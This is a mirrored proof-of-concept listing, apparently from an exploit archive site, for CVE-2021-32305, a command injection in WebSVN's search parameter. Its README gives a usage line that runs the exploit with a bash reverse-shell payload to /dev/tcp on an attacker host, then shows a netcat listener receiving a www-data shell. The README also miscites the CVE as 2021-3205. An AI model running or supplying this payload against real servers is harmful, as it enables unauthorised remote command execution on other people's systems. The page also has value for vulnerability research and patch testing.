Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2021-32305 PoC — websvn 操作系统命令注入漏洞

Source
https://github.com/FredBrave/CVE-2021-32305-websvn-2.6.0
Associated Vulnerability
Title:websvn 操作系统命令注入漏洞 (CVE-2021-32305)
Description:WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Description
This is a exploit of CVE-2021-32305 a web vulnerability to command injection on search.php path, this exploit allows execute commands.
Readme
# CVE-2021-3205-websvn-2.6.0
This is a exploit of CVE-2021-3205 a web vulnerability to command injection on search.php path, this exploit allows execute commands.
# Requirements
optparse, signal, requests
# Usage
```bash
❯ python3 CVE-2021-3205.py --url http://10.0.2.168/websvn/ --payload "bash -c 'bash -i >& /dev/tcp/10.0.2.133/443 0>&1'"

...

❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.133] from (UNKNOWN) [10.0.2.168] 34174
bash: cannot set terminal process group (357): Inappropriate ioctl for device
bash: no job control in this shell
www-data@agent:~/html/websvn$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@agent:~/html/websvn$ 


```
File Snapshot

 [4.0K]  /data/pocs/c0a36d725e66ba89f638e3e60f3b6e3e26dff1a5
├── [1.3K]  CVE-2021-32305.py
└── [ 692]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →